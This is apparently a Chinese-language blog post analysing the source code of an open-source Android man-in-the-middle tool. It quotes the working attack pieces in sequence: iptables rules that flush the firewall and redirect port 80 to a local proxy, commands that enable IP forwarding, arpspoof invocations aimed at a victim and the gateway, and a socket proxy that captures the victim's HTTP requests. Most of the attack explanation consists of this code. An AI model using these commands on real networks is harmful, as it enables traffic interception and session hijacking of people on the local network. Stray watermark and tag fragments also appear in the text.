Android 中間人攻擊

標籤：命令   預覽   alt   echo   bre   sdi   forward   nts   ddr   

   0x00

    Android中間人攻擊的思路就是劫持區域網路中被攻擊機器和server間的對話。被攻擊機器和server表面上工作正常，實際上已經被中間人劫持。能夠從一張圖來明確這個過程。

    受攻擊主機發送的資料，首先經過了攻擊者。從server返回的資料也經過攻擊者，再發送給受攻擊主機。

   0x01

    Android開源中間人攻擊範例。請參考https://github.com/ssun125/Lanmitm。我們這裡主要分析這個連結中效果預覽中工作階段劫持的原理。

   

watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQv/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" />

    分析https://github.com/ssun125/Lanmitm源碼，要實現arp欺騙，有關鍵的四步：

    1、使用Iptables進行NAT資料包轉寄

public static final String[] PORT_REDIRECT_CMD = {"iptables -t nat -F","iptables -F","iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE","iptables -P FORWARD ACCEPT","iptables -t nat -A PREROUTING -j DNAT -p tcp --dport 80 --to "+ AppContext.getIp() + ":" + HttpProxy.HTTP_PROXY_PORT };

    這個命令是在ProxyService類的startHttpProxy方法中調用的。

    2、開啟連接埠轉寄，同意本機像路由器那樣轉寄資料包

private String[] FORWARD_COMMANDS = { "echo 1 > /proc/sys/net/ipv4/ip_forward","echo 1 > /proc/sys/net/ipv6/conf/all/forwarding" };

    這個是在ArpService類的onStartCommand方法中調用的。

    3、ARP投毒

if ((ONE_WAY_HOST & arp_cheat_way) != 0) {if (target_ip == null)target_ip = AppContext.getTarget().getIp();if (!target_ip.equals(AppContext.getGateway()))arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName+ " -t " + target_ip + " "+ AppContext.getGateway();elsearp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName+ " -t " + AppContext.getGateway() + " "+ target_ip;arpSpoof = new Thread() {@Overridepublic void run() {ShellUtils.execCommand(arp_spoof_cmd, true, false);}};arpSpoof.start();}if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName+ " -t " + AppContext.getGateway() + " "+ AppContext.getIp();arpSpoofRecv = new Thread() {@Overridepublic void run() {ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);}};arpSpoofRecv.start();}

    這個是在ArpService類的onStartCommand方法中調用的。

    4、在攻擊者機器依據Socket原理，建立一個WebServer，原理相似於使用NanoHttpd實現簡易WebServer。

這樣被攻擊者發送給攻擊者的請求就能被擷取。而且顯示在介面上。

   核心的代碼例如以下：

public class HttpProxy extends Thread {......@Overridepublic void run() {try {mServerSocket = new ServerSocket();mServerSocket.setReuseAddress(true);mServerSocket.bind(new InetSocketAddress(AppContext.getInetAddress(),HTTP_PROXY_PORT), BACKLOG);executor = Executors.newCachedThreadPool();while (!stop) {Socket client = mServerSocket.accept();DealThread dealThread = null;switch (mProxyMode) {case MODE_PROXY_SIMPLE:dealThread = new SimpleDealThread(client,mOnRequestListener);break;case MODE_PROXY_DEEP:dealThread = new DeepDealThread(client, mOnRequestListener);break;}executor.execute(dealThread);}} catch (IOException e) {e.printStackTrace();} finally {if (mServerSocket != null) {try {mServerSocket.close();} catch (IOException e) {e.printStackTrace();}}if (executor != null) {executor.shutdownNow();}}}......}

Android 中間人攻擊